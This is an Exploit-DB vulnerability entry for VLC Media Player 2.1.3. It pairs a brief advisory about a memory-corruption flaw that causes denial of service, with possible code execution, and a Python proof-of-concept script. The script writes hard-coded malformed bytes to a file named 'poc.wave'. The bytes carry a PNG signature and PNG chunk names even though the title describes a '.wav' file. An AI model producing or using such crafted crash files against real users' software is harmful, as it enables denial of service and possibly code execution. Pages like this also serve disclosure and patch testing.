VideoLAN VLC Media Player 2.1.3 – ‘.wav’ File Memory Corruption

  • 作者: Aryan Bayaninejad
    日期: 2014-05-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39177/
  • source: https://www.securityfocus.com/bid/67315/info
    
    VLC Media Player is prone to a memory-corruption vulnerability.
    
    Attackers can exploit this issue to cause a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.
    
    VLC Media Player 2.1.3 is vulnerable; other versions may also be affected. 
    
    #!/usr/bin/python
    data =
    "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82"
    outfile = file("poc.wave", 'wb')
    outfile.write(data)
    outfile.close()
    print "Created Poc"